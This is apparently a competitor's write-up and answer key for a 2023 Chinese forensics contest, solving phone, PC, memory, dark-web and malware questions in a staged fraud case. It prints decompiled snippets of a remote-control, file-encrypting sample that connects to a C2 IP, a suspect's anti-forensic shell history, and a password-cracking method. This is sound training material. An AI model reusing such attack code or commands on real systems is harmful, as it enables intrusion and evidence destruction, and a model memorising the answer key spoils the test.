2023第一届盘古石晋级赛
前言
以赛代练,以赛促学。唯有参赛,才知道菜。
容器密码:usy1UN2Mmgram&^d?0E5r9myrk!cmJGr
Android APK部分
1、涉案应用刷刷樂的签名序列号是[★☆☆☆☆]
我直接用雷电APP分析查看
详细信息——>有效签名APK1
答案:11fcf899
2、涉案应用刷刷樂是否包含读取短信权限答案:是/否[★★☆☆☆]
| 级别(危险) | 读取电话状态android.permission.READ_PHONE_STATE | |
|---|---|---|
| 级别(正常) | 查看网络连接android.permission.ACCESS_NETWORK_STATE | 查看Wi-Fi连接android.permission.ACCESS_WIFI_STATE |
| 连接和断开Wi-F iandroid.permission.CHANGE_WIFI_STATE |
安卓前台服务android.permission.FOREGROUND_SERVICE | |
| 完全网络访问 android.permission.INTERNET |
请求安装应用android.permission.REQUEST_INSTALL_PACKAGES | |
| 控制振动android.permission.VIBRATE | 修改或删除SD卡中的内容android.permission.WRITE_EXTERNAL_STORAGE | |
| android.permission.WAKE_LOCK | 修改华为桌面设置com.huawei.android.launcher.permission.CHANGE_BADGE |
答案:否
3、涉案应用刷刷樂打包封装的调证ID值是[答案:123ca12a] [★★☆☆☆]
雷电app智能分析第三方服务中,查看调度值
答案:a6021386163125
4、涉案应用刷刷樂服务器地址域名是[答案:axa.baidun.com] [★★★☆☆]
在源码中的index.html中可以找到服务器地址域名
api.openFrame({
name: 'main',
url: 'http://vip.shuadan.com:8084',
bounces: false,
rect: {
w: 'auto',
h: 'auto'
},
progress:{
type:'page'
}
});
答案:http://vip.shuadan.com:8084
5、涉案应用刷刷樂是否存在录音行为[答案:是/否] [★★★☆☆]
搜索关键词:在反编译后的源代码中搜索关键词,如"record audio"、“audio recording”、"MediaRecorder"等。这些关键词通常与录音功能相关联。
在jadx中可以在com.uzmap.pkg.a.b.e搜索到录音相关功能
import android.media.MediaRecorder;
答案:是
6、涉案应用未来资产的包名是[答案:axa.baidun.com] [★☆☆☆☆]
任意检查APK软件都可以看
答案: plus.H5CE4B30D
7、涉案应用未来资产的语音识别服务的调证key值是[答案:1ca2jc] [★★☆☆☆]
在可以查看AndroidManifest.xml
科大讯飞股份有限公司
讯飞开放平台:IFLY_APPKEY:53feacdd
答案:53feacdd
8、涉案应用未来资产的服务器地址域名是[答案:axa.baidun.com] [★★★☆☆]
使用雷电APP智能分析
答案:http://vip.usdtre.club:8085/
9、涉案应用未来资产的打包封装的调证ID值是是[答案:axa.baidun.com] [★★☆☆☆]
直接查看打包服务商
答案:H5CE4B30D
手机取证部分
1、根据容恨寒的安卓手机分析,手机的蓝牙物理地址是[答案:B9:8B:35:8B:03:52] [★☆☆☆☆]
手机取证系统直接看
答案:A9:8B:34:8B:04:50
2、根据容恨寒的安卓手机分析,SIM卡的ICCID是[答案:80891103212348510720] [★☆☆☆☆]
手机取证系统直接看
答案:89014103211118510720
3、根据容恨寒的安卓手机分析,团队内部沟通的聊天工具程序名称是[答案:微信] [★☆☆☆☆]
根据后面的题目,再数据库查找信息时确定的
答案:Potato
4、根据容恨寒的安卓手机分析,团队内部沟通容恨寒收到的最后一条聊天信息内容是[答案:好的] [★★★☆☆]
首先找到包名为com.qim.imm的文件夹,文件夹下有数据库文件
路径:/data/data/com.qim.imm/databases/im_db_225_18969939616_8AF2C81F-58C2-8459-C492-9C4F65E6BC1E.db
我的需要从本地文件中导出使用,挂载起手机取证分析系统后,导出就没有这个目录
之后用SQL数据库软件导入表
使用语句直接查询
SELECT TONAME,DATE,BODY FROM "BAProvider$j" WHERE TONAME='容恨寒' ORDER BY DATE DESC LIMIT 1
得到BODY
| DATE | BODY |
|---|---|
| 1681302605884863 | PEJURj48Rm9udCBuYW1lPSJNaWNyb3NvZnQgWWFIZWkiIHNpemU9IjEwIiBmbGFncz0iMSIgLz48VGV4dD7lkI7pnaLlho3nu5nkvaDku6zmkJ48L1RleHQ+PC9CVEY+ |
BODY解密后
后面再给你们搞 答案:后面再给你们搞
5、根据容恨寒的安卓手机分析,收到的刷单.rar的MD5值是[答案:202cb962ac59075b964b07152d234b70] [★★☆☆☆]
答案:dc52d8225fd328c592841cb1c3cd1761
6、根据容恨寒的安卓手机分析,收到的刷单.rar的解压密码是[答案:abcdg@1234@hd] [★★★☆☆]
在表中BAProvider$h
密码规则:
前五位:wlzhg
末尾两位:片区简写“xn”
中间四位:0-9随机数组合
各部分用@连接
示例:wlzhg@8888@xn
使用Passware Kit Forensic进行掩码爆破
自定义设置
字符长:13 to 13
语言:English
已知部分密码:wlzhg@*@xn
选择:Number
答案:wlzhg@3903@xn
7、根据容恨寒的安卓手机分析,发送刷单.rar的用户的手机号是[答案:15137321234] [★★★★☆]
将BAProbider j 与 B A P r o b i d e r j与BAProbider j与BAProbiderb数据进行base64解密
在id为860C8E3C-3CA5-42C3-94B2-B5ECDF3B3FA1的一行上可以发现是发送了刷单.rar
从而确定了用户为德彦慧
解密脚本
import openpyxl
import base64
def decode_base64(base64_string):
return base64.b64decode(base64_string).decode('utf-8')
# 读取Excel文件
wb = openpyxl.load_workbook('.xlsx')
sheet = wb.active
# 创建新的工作簿
new_wb = openpyxl.Workbook()
new_sheet = new_wb.active
# 遍历每个单元格
for row in sheet.iter_rows(values_only=True):
new_row = []
for idx, cell in enumerate(row):
# 根据你需要解密的列数,如果是第八列(列索引为7)且单元格的数据是字符串
if idx == 2 and isinstance(cell, str):
decoded_data = decode_base64(cell)
new_row.append(decoded_data)
else:
new_row.append(cell)
new_sheet.append(new_row)
# 保存新的Excel文件
new_wb.save('.xlsx')
答案:15137326185
8、根据容恨寒的安卓手机分析,发送多个报表的用户来自哪个部门[答案:理财部] [★★★★★]
可以找到一个有相关部门的表。
其实根据案件解析就知道有一名技术人员,估计属于技术部。
正常做法:
根据将BAProbider$j与BAProbider$b数据进行关联,可以得到文件都是臧觅风发的
在表o可以得到风的id为229,表k中技术部的id为109
在表m中可以得知与109相关联的有228、229、230
所以风是来自技术部的
答案:技术部
9、根据容恨寒的安卓手机分析,MAC的开机密码是[答案:asdcz] [★☆☆☆☆]
手机备忘录记事本
答案:apple
10、根据容恨寒的安卓手机分析,苹果手机的备份密码前4位是[答案:1234] [★☆☆☆☆]
手机备忘录记事本
答案:1976
11、根据魏文茵苹果手机分析,IMEI号是?[答案格式:239471000325479] [★☆☆☆☆]
设备信息
答案:358360063200634
12、根据魏文茵苹果手机分析,可能使用过的电话号码不包括?[答案格式:A] [★☆☆☆☆]
A、18043618705
B、19212175391
C、19212159177
D、18200532661
只有D没有搜索到
答案:D
13、根据臧觅风的安卓手机分析,微信ID是[答案:wxid_av7b3jbaaht123] [★☆☆☆☆]
查看通讯工具微信,账号信息
答案:wxid_kr7b3jbooht322
14、根据臧觅风的安卓手机分析,在哪里使用过交友软件[答案:杭州] [★★★☆☆]
就只有交友软件探探中给了地址西安,其他的没有
答案:西安
15、根据臧觅风的安卓手机分析,嫌疑人从哪个用户购买的源码,请给出出售源码方的账号[答案:1234524229] [★☆☆☆☆]
在Telegram中发现
在与ming chen的聊天记录中可以发现,就是在他这里购买的源码
查看好友ming chen的信息
答案:5768224669
16、根据臧觅风的安卓手机分析,购买源码花了多少BTC?[答案:1.21] [★☆☆☆☆]
与ming chen聊天记录
ming chen
0.2BT
后来讲价为
0.08
答案:0.08
17、根据臧觅风的安卓手机分析,接收源码的邮箱是[答案:[email protected]] [★☆☆☆☆]
还是聊天记录
18、嫌疑人容恨寒苹果手机的IMEI是?[★★☆☆☆]
直接查看备份文件中的info.plist文件,检索IMEI
答案:353271073008914
19、嫌疑人容恨寒苹果手机最后备份时间是?[答案格式:2000-01-01 13:36:25] [★★☆☆☆]
在info文件中,存在值Last Backup Date,将值取出加上8就是答案
答案:2023-04-12 21:20:59
20、嫌疑人容恨寒苹果手机“易信”的唯一标识符(UUID)?[★★★★☆]
直接去软件数据保存的地方找,一般以包名为命名的文件夹中包含许多相关信息,比如数据库,标识文件等
在手机文件中找到/AppDomain-com.yixin.yixin/Documents/login_device_id_v1
打开就看到
答案:ec677dda-3387-4337-9b44-f7daae4fb29c
21、嫌疑人容恨寒苹果手机微信ID是?[★☆☆☆☆]
取证分析后直接查看微信账号信息
答案:wxid_peshwv0rosih12
计算机部分
魏文茵
1、嫌疑人魏文茵计算机的操作系统版本?[答案格式:Windows 7 Ultimate 8603] [★☆☆☆☆]
火眼取证分析,操作系统信息中注意操作系统版本和当前Build版本号
答案:Windows 10 Pro Professional 14393
2、嫌疑人魏文茵计算机默认的浏览器是?[答案格式:A] [★☆☆☆☆]
A、Edge
B、Internet Explorer
C、Google Chrome
D、360浏览器
仿真查看默认软件
答案:C
3、嫌疑人魏文茵计算机中以下那个文档不是嫌疑人最近打开过的文档?[答案格式:A] [★☆☆☆☆]
A、掠夺攻略.docx
B、工资表.xlsx
C、刷单秘籍.docx
D、脚本.docx
用户痕迹–查看最近访问的office文档
答案:A
4、嫌疑人魏文茵计算机中存在几个加密分区?[答案格式:3个] [★★☆☆☆]
火眼取证软件启动是可以发现D,取证大师显示是E,但是都是只有一个被Bitlocker密钥加密了
答案:1个
5、嫌疑人魏文茵计算机中安装了哪个第三方加密容器?[答案格式:VeraCrypt] [★☆☆☆☆]
仿真系统就可以看到
答案:TrueCrypt
6、接上题,嫌疑人魏文茵计算机中加密容器加密后的容器文件路径?[答案格式:C:\xxx\xxx] [★★☆☆☆]
在取证大师中的文件分析中,加密文件中存在两个
MicroMsg.db
名称:《穿越六十年代小知青》作者:平淡生活.txt
答案:D:\Users\WH\Documents\
7、嫌疑人魏文茵计算机中磁盘分区BitLocker加密恢复秘钥为?[答案格式: 000000-000000-000000-000000-000000-000000-000000-000000] [★★★☆☆]
首先对D盘进行卷影分析,在分析出来的文件记录进行原始数据搜索
关键字:恢复密钥
答案:000649-583407-395868-441210-589776-038698-479083-651618
8、嫌疑人魏文茵计算机中BitLocker加密分区中“攻略.docx”文档里涉及多少种诈骗方式?[答案格式:11] [★☆☆☆☆]
导出攻略.docx
答案:38
9、投资理财团伙“华中组”目前诈骗收益大约多少?[答案格式:10万] [★★☆☆☆]
125969.98
从打开的office文件中查看银行存款日记账
答案:12万
10.通过对嫌疑人魏文茵计算机内存分析,print.exe的PID是?[答案格式:123] [★★☆☆☆]
volatility -f memdump.mem --profile=Win10x64_10586 pslist | grep print
答案:728
臧觅风
11.根据臧觅风的计算机分析,请给出技术人员计算机“zang.E01”的SHA-1?(答案格式:7B2DC1741AE00D7776F64064CDA321037563A769)(★☆☆☆☆)
答案:813FC904ECA559B2DCFCE2802AE87E013DAAA81F
12.根据臧觅风的计算机分析,请给出该技术人员计算机“zang.E01”的总扇区数?(答案格式:100,000,000)(★★☆☆☆)
用x-ways打开,并加载镜像后右键属性
总容量: 274,877,906,944 字节 = 256 GB
每扇区字节数: 512
扇区统计: 536,870,912
答案:536,870,912
13.根据臧觅风的计算机分析,以下那个文件不是技术人员通过浏览器下载的?(答案格式:A)(★☆☆☆☆)
A.WeChatSetup.exe
B.aDrive.exe
C.Potato_Desktop2.37.zip
D.BaiduNetdisk_7.27.0.5.exe
可以查看下载的目录,或者仿真计算机在浏览器中查看下载记录
答案:D
14.根据臧觅风的计算机分析,请给出该技术人员邮件附件“好东西.zip”解压密码?(答案格式:abc123)(★★★★★)
手机17题中提到了解压密码为对方邮箱,则密码为kangshifu0008
答案:kangshifu0008
15.根据臧觅风的计算机分析,该技术人员电脑内曾通过远程管理工具连接过服务器“master.k8s.com”,请给出连接的端口号?(答案格式:22)(★★☆☆☆)
全局搜索
S:"Hostname"=master.k8s.com
S:"Username"=root
D:"[SSH2] 端口"=000008ea
十六进制转二进制
答案:2282
16.根据臧觅风的计算机分析,接上题,请给出服务器的密码?(答案格式:password(★★★★☆)
在同样的文件中可以找到
"Password"=u9e213284b79b4970c7962291aee426959ee4384d66ad6179b9d0a08a2d5654bc
不知道什么加密
但是可以找到一个叫账号信息的word,里面有记录
服务器账号密码:P@ssw0rd
IM系统密码:administrator/P@ssw0rd
答案:P@ssw0rd
17.根据臧觅风的计算机分析,据该技术人员交代,其电脑内有个保存各种密码的txt文件,请找出该文件,计算其MD5值?(答案格式:7B2DC1741AE00D7776F64064CDA321037563A769)(★★★★★)
全局搜索password
答案:C1934045C3348EA1BA618279AAC38C67
18.根据臧觅风的计算机分析,该技术人员曾使用过加密容器反取证技术,请给出该容器挂载的盘符?(答案格式:A)(★☆☆☆☆)
在仿真电脑上可以看到,存在盘符F
答案:F
19.根据臧觅风的计算机分析,请给出该技术人员电脑内keePass的Master Password?(答案格式:password12#)(★★★★☆)
KeePass 是一个密码管理工具,Master Password(主密码)是用于保护 KeePass 数据库的密码。Master Password 是用户自行设置的,用于加密和解密整个 KeePass 数据库文件。每次打开或访问 KeePass 数据库时,都需要提供正确的 Master Password 才能解锁数据库并获取保存在其中的密码信息。
20.根据臧觅风的计算机分析,请给出该技术人员所使用的爬虫工具名称?(答案格式:xxx)(★★☆☆☆)
仿真后在电脑桌面
答案;后羿采集器
21.根据臧觅风的计算机分析,接上题,该技术人员通过该采集器一共采集了多少条人员信息数据?(答案格式:xxx)(★★★★★)
在坚果手机的/storage/emulated/0/Android/data/com.qim.imm/files/Potato/Attachment目录下有6个表,依次计算即可
18970+17+100+13+96+29
答案:19225
22.根据臧觅风的计算机分析,以下那个不是该技术人员通过爬虫工具采集的数据?(答案格式:A)(★☆☆☆☆)
A.中国证券投资基金业协人员信息
B.仓山区市场监督管理局行政执法人员信息
C.清平镇卫生院基本公共卫生服务
D.仓山区市场监督管理局行政执法人员信息
答案:C
23.根据臧觅风的计算机分析,该嫌疑人曾浏览过“阿里云WebDAV”,请给出该“阿里云WebDAV”端口号?(答案格式:2211)(★★☆☆☆)
谷歌浏览器历史记录
搜索WebDAV,可以得到一个网址,192.168.8.20.再过滤这个网址
可以得到曾经访问过8080端口
答案:8080
24.根据臧觅风的计算机分析,请给出该技术人员电脑内代理软件所使用的端口号?(答案格式:2211)(★★☆☆☆)
打开小猫咪,7890.
一般来说默认的就是7890
答案:7890
25.根据臧觅风的计算机分析,接上题,请给出该代理软件内订阅链接的token?(答案格式:abc1234df334…)(★★☆☆☆)
设置订阅
答案:4fedf57596247dfac21b5c17aab1778e
26.根据臧觅风的计算机分析,请给出该技术人员电脑内用于内部通联工具的地址和端口?(答案格式:www.baidu.com:1122)(★★★☆☆)
查看Potato
usdterclub
im.pgscup.com
6661
答案:im.pgscup.com:6661
27.根据臧觅风的计算机分析,请给出该电脑内存镜像创建的时间(北京时间)?(答案格式:2023-05-0614:00:00)(★☆☆☆☆)
使用命令:vol.exe -f 1.mem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win10x64_14393, Win10x64_10586, Win10x64, Win2016x64_14393
AS Layer1 : Win10AMD64PagedMemory (Kernel AS)
Image date and time : 2023-04-27 09:57:53 UTC+0000
Image local date and time : 2023-04-27 17:57:53 +0800
答案:2023-04-27 17:57:53
28.根据臧觅风的计算机分析,以下那个不是“chrone.exe”的动态链接库?(答案格式:A)(★★★★☆)
A.ntdll.dll
B.iertutil.dll
C.wow64cpu.dll
D.wow64win.dll
使用命令获取进程的pid
vol.exe -f 1.mem --profile=Win10x64_14393 pslist | grep chrone
0xffff878e27f02080 chrone.exe 7424 3604 32 0 1 0 2023-04-27 09:47:13 UTC+0000
0xffff878e27f85080 chrone.exe 7888 7424 8 0 1 0 2023-04-27 09:47:13 UTC+0000
0xffff878e27464800 chrone.exe 6388 7424 15 0 1 0 2023-04-27 09:47:13 UTC+0000
0xffff878e2530c080 chrone.exe 7720 7424 14 0 1 0 2023-04-27 09:47:13 UTC+0000
0xffff878e27ebb080 chrone.exe 5968 7424 7 0 1 0 2023-04-27 09:47:13 UTC+0000
0xffff878e24cc0080 chrone.exe 8376 7424 16 0 1 0 2023-04-27 09:48:00 UTC+0000
0xffff878e25530080 chrone.exe 8696 7424 16 0 1 0 2023-04-27 09:48:10 UTC+0000
0xffff878e2551d080 chrone.exe 6032 7424 16 0 1 0 2023-04-27 09:48:41 UTC+0000
0xffff878e25688080 chrone.exe 7944 7424 21 0 1 0 2023-04-27 09:49:28 UTC+0000
0xffff878e25698080 chrone.exe 8980 7424 24 0 1 0 2023-04-27 09:49:32 UTC+0000
0xffff878e281c0080 chrone.exe 1420 7424 22 0 1 0 2023-04-27 09:49:39 UTC+0000
使用命令打印dll
vol.exe -f 1.mem --profile=Win10x64_14393 dlllist -p 7424
Volatility Foundation Volatility Framework 2.6
************************************************************************
chrone.exe pid: 7424
Command line :
Base Size LoadCount Path
------------------ ------------------ ------------------ ----
0x00000000008b0000 0x279000 0x0 伏见僙ᷨ
0x00007ffba34e0000 0x1d2000 0x0 C:\Windows\SYSTEM32\ntdll.dll
0x0000000058200000 0x52000 0x0 C:\Windows\System32\wow64.dll
0x0000000058260000 0x77000 0x0 C:\Windows\System32\wow64win.dll
0x00000000581f0000 0xa000 0x0 C:\Windows\System32\wow64cpu.dll
答案:B
29.根据臧觅风的计算机分析,请给出“\REGISTRY\MACHINE\SYSTEM”在内存镜像中的虚拟地址是多少?(答案格式:0xxxxx123…)(★★☆☆☆)
使用命令查看
vol.exe -f 1.mem --profile=Win10x64_14393 hivelist
0xffffab861963e000 0x00000000584a1000 \REGISTRY\MACHINE\SYSTEM
答案:0xffffab861963e000
30.根据臧觅风的计算机分析,据嫌疑人交代,其电脑上曾存打开过一个名为“账号信息.docx”的文档,请给出该文档的最后访问时间(北京时间)?(答案格式:2023-05-06 14:00:00)(★★★★☆)
用x-ways看
绝对路径 \backup\mydata\账号信息.docx
上级目录 mydata
文件大小 13.0 KB (13,308)
创建时间 2023-04-27 17:54:06 +8
修改时间 2023-04-27 17:55:32 +8
记录更新时间 2023-04-27 17:55:32 +8
记录更新时间² 2023-04-27 17:55:32 +8
访问时间 2023-04-27 17:55:32 +8
答案:2023-04-27 17:55:32
31.根据臧觅风的计算机分析,接上题,请给出该文档的存储路径?(答案格式:C:\xxx\xxx)(★★★☆☆)
答案:D:\backup\mydata\
容恨寒
32.嫌疑人容恨寒苹果电脑的系统版本名称是?(答案格式:注意大小写)(★☆☆☆☆)
火眼取证
答案:macOS 12.6
33.嫌疑人容恨寒苹果电脑操作系统安装日期是?(答案格式:2000-01-01)(★★☆☆☆)
系统安装记录
答案:2022-10-09
34.嫌疑人容恨寒苹果电脑的内核版本是?(答案格式:xxxxx 11.0.4,注意大小写)(★☆☆☆☆)
使用命令
uname -a
答案:Darwin Kernel Version 21.6.0
35.嫌疑人容恨寒苹果电脑有多少正在运行的后台程序?(答案格式:20)(★★☆☆☆)
36.嫌疑人容恨寒苹果电脑最后一次关机时间(GMT)?(答案格式:2000-01-01 01:00:09)(★★☆☆☆)
查看系统日志var/log/system.log,还是要注意时区,日志里记录的是当地时区,-8
Apr 14 15:55:50 appledeMac sessionlogoutd[641]: DEAD_PROCESS: 153 console
Apr 14 15:55:50 appledeMac shutdown[648]: SHUTDOWN_TIME: 1681458950 786473
答案:2023-4-14 7:55:50
37.嫌疑人容恨寒苹果电脑执行过多少次查询主机名称命令?(答案格式:20)(★★★☆☆)
hostname命令用于显示当前设备的主机名。在终端中运行hostname命令即可获取主机名
在users/username目录下查看zsh_history文件
-6
uname
hostnamectl
hostname
history
sudo spctl --master-disable
sudo xattr -r -d com.apple.quarantine /Users/apple/Downloads/渚兓楂兏鐑﹥ㄦ兗?郴缁兛浣跨兇ㄧ兒儰iTunes锛儴鎯瘍板儻兌鑳ИMojave锛儵/iTunes.app
cd /
ls
find / -name vmshare
sudo xattr -r -d com.apple.quarantine /Applications/BigAnt5.app
ls
cd library
ls
su root
su root
sudo passwd root
sudo password root
find / -name backup
fdisk -l
sudo fdisk -l
diskutil list
df
sudo dd if=/dev/disk0 of=/Volumes/VMware Shared Folders/mac.dd bs=1m conv=noerror,sync
df
sudo dd if=/dev/disk0 of=/Volumes/Untitled/mac.dd bs=1m conv=noerror,sync
su root
hostname
hostnamectl
sudo dd if=/dev/disk0 of=/Volumes/Untitled/mac.dd bs=1m conv=noerror,sync
sudo su
diskulits list
diskutli list
history -c
diskutil list
sudo dd if=/dev/disk1 of=/Volumes/Untitled/mac.dd bs=1m conv=noerror,sync csrutli disable
sudo csrutli disable
在终端历史命令中有两个hostname
答案:2
38.从嫌疑人容恨寒苹果电脑中找出“陆文杰”提现金额是?(答案格式:20)
华南区文件用010查看为rar压缩包
对桌面上华南区文件进行爆破
得到wlzhg@3698@hn
得到三个文件:华南区、脚本、人员信息
在华南区中发现
| 2992336319 | 陆文杰 | 提现 | 10.00 | 0.16 | 2023-04-12 16:44:41 |
|---|
答案:10
39.从嫌疑人容恨寒苹果电脑中找出嫌疑人容恨寒上午上班时长是?(答案格式:8小时)(★★★★☆)
脚本.docx
答案:2.5小时
40.从嫌疑人容恨寒苹果电脑中找出“万便”的邮箱是?(答案格式:[email protected])(★★★★☆)
人员信息.txt
万便,女,30,03619361738,兴告什沙之早跑离入小才够实孩法人望帮如总船花,[email protected]
41.通过分析得出嫌疑人容恨寒小孩的年龄是?(答案格式:10岁)(★★★☆☆)
在users下看到奥数教程,是一年级教程
在回收站中发现一篇是八年级的
答案:7岁或者14岁
二进制部分
1.根据魏文茵的计算机分析,恶意程序加了什么类型的壳(答案:asdcz)(★★☆☆☆)
使用PEID加载
UPX -> www.upx.sourceforge.net *
答案:UPX
2.根据魏文茵的计算机分析,恶意程序调用了几个dll(答案:1)(★★★☆☆)
DLL是动态链接库(Dynamic Link Library)的缩写,它是一种可执行文件格式,包含一组可被多个程序共享和重用的函数、类、变量和资源。DLL文件中的代码和数据可以被程序在运行时动态加载和链接,从而实现代码的共享和模块化。
DLL文件通常用于存储一些通用的功能和资源,例如图形界面库、数学函数库、数据库访问库等。通过将这些功能封装在DLL文件中,多个程序可以共享同一份代码,从而减少了代码的重复性,节省了存储空间,并提高了代码的维护性和可重用性。
在程序运行时,如果需要使用DLL文件中的函数或资源,程序可以通过动态链接的方式将DLL文件加载到内存中,并调用其中的函数或访问其中的资源。这种方式使得程序能够动态地调用、更新和替换DLL文件,而无需重新编译和链接整个程序。
总而言之,DLL文件是一种用于实现代码共享和模块化的文件格式,它在软件开发中起到了重要的作用,提高了代码的复用性和可维护性。
使用UPX脱壳工具
upx -d file
之后在IDA中打开查看
查看 Imports 信息, 一共调用了 IPHLPAPI, KERNEL32, SHELL32, USER32, WS32_32 5个 dll.
答案:5
3.根据魏文茵的计算机分析,恶意程序中send函数被多少个函数调用(答案:1)(★★★☆☆)
在Import中找到send函数,双击跳转,右键查看Xrefs graph to
除了一个跳转jmp
答案:6
4.根据魏文茵的计算机分析,恶意程序远控端ip(答案:120.1.2.3)(★★☆☆☆)
查看stings中
答案:192.168.8.110
5.根据魏文茵的计算机分析,恶意程序远控端端口(答案:123)(★★☆☆☆)
if ( v15 != -1 )
{
v10[0] = 2;
htons(6069);
v10[1] = sub_45A102();
inet_addr("192.168.8.110");
v11 = sub_45A102();
connect(v15, v10, 16);
v18 = sub_45A102();}
下面是对代码的解释:
- 如果变量v15不等于-1,执行以下操作:
- 将数组v10的第一个元素设置为2。
- 调用htons函数对端口号6069进行字节序转换(可能是为了与网络字节序进行匹配)。
- 将v10的第二个元素设置为调用sub_45A102函数的返回值。
- 调用inet_addr函数将IP地址字符串"192.168.8.110"转换为网络字节序的32位IP地址。
- 将v11设置为调用sub_45A102函数的返回值。
- 调用connect函数,将v15作为套接字描述符,v10作为目标地址结构体的指针,16表示地址结构体的大小。
- 将v18设置为调用sub_45A102函数的返回值。
答案:6069
6.根据魏文茵的计算机分析,恶意程序用到是tcp还是udp(★★★☆☆)
socket(2, 1, 6);
v15 = sub_45A102();
if ( v15 != -1 )
{
v10[0] = 2;
htons(6069);
v10[1] = sub_45A102();
inet_addr("192.168.8.110");
v11 = sub_45A102();
connect(v15, v10, 16);
v18 = sub_45A102();
其中socket值为2,根据socket function (winsock2.h)给出的定义, 所以为tcp协议连接。
答案:TCP
7.根据魏文茵的计算机分析,恶意程序能执行几条命令(答案:123)(★★★★☆)
主函数中存在
for ( j = 0; j < v7; ++j )
v17[j] ^= 0x70u;
sub_458AF0("%d %s\n");
if ( sub_45B6B5(v17, "3w", 2) )
{
if ( sub_45B6B5(v17, "4e", 2) )
{
if ( sub_45B6B5(v17, "5r", 2) )
{
if ( sub_45B6B5(v17, "6s", 2) )
{
if ( sub_45B6B5(v17, "7t", 2) )
答案:5
8.根据魏文茵的计算机分析,恶意程序加密电脑文件对应是哪个命令(答案:1a)(★★★☆☆)
答案:待定
9.(多选题)根据魏文茵的计算机分析,恶意程序加密哪些后缀文件(★★★☆☆)
A.docx
B.xlsx
C.pdf
D.doc
在stings中可以看到,跳转到函数里可以看到加密代码
else if ( sub_45B42B(v6, ".doc")
|| sub_45B42B(v6, ".docx")
|| sub_45B42B(v6, ".xls")
|| sub_45B42B(v6, ".xlsx")
|| sub_45B42B(v6, ".pdf") )
答案:ABCD
10.根据魏文茵的计算机分析,编写该程序电脑的用户名是(答案:12345)(★★★★★)
过滤一下strings
.rdata:00537C28 0000001E C C:\\Users\\22383\\Desktop\\tmp\\exe
答案:22383
11.嫌疑人魏文茵计算机中“工资表.xlsx”中,发放工资总金额为:(答案格式:12345))(★★★★★)
答案:待定
暗网取证
1.臧觅风电脑使用暗网浏览器版本是?(答案格式:10.0.0)(★☆☆☆☆)
全局搜索
可以在Users/WH/AppData/Local/Temp/vmware-WH/VMwareDnD/aa93e098/Tor Browser.zip中找,导出解压
版本: 102.9.0esr (64 位)
答案:102.9.0
2.臧觅风电脑使用的暗网浏览器历史记录中最多浏览内容是?(答案格式:制作)(★★☆☆☆)
查看历史记录
答案:比特币市场
3.臧觅风电脑使用的暗网网浏览器书签“社工库”添加的时间是?(答案格式:2000-01-01 01:00:09)(★★★★☆)
火眼取证分析
答案:2022-05-27 21:49:33
4.臧觅风电脑使用的暗网浏览器第一次使用时间是?(答案格式:2000-01-01 01:00:09)(★★★☆☆)
答案:2023-04-12 10:19:06
5.臧觅风电脑使用的暗网浏览器扩展应用中“ftp.js”文件的md5值是?(答案格式:字母小写)(★★★★★)
找到文件{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi,在content目录下,解压后将ftp.js导出来即可
答案:EA86403D1DE3089B3D32FE5706D552F6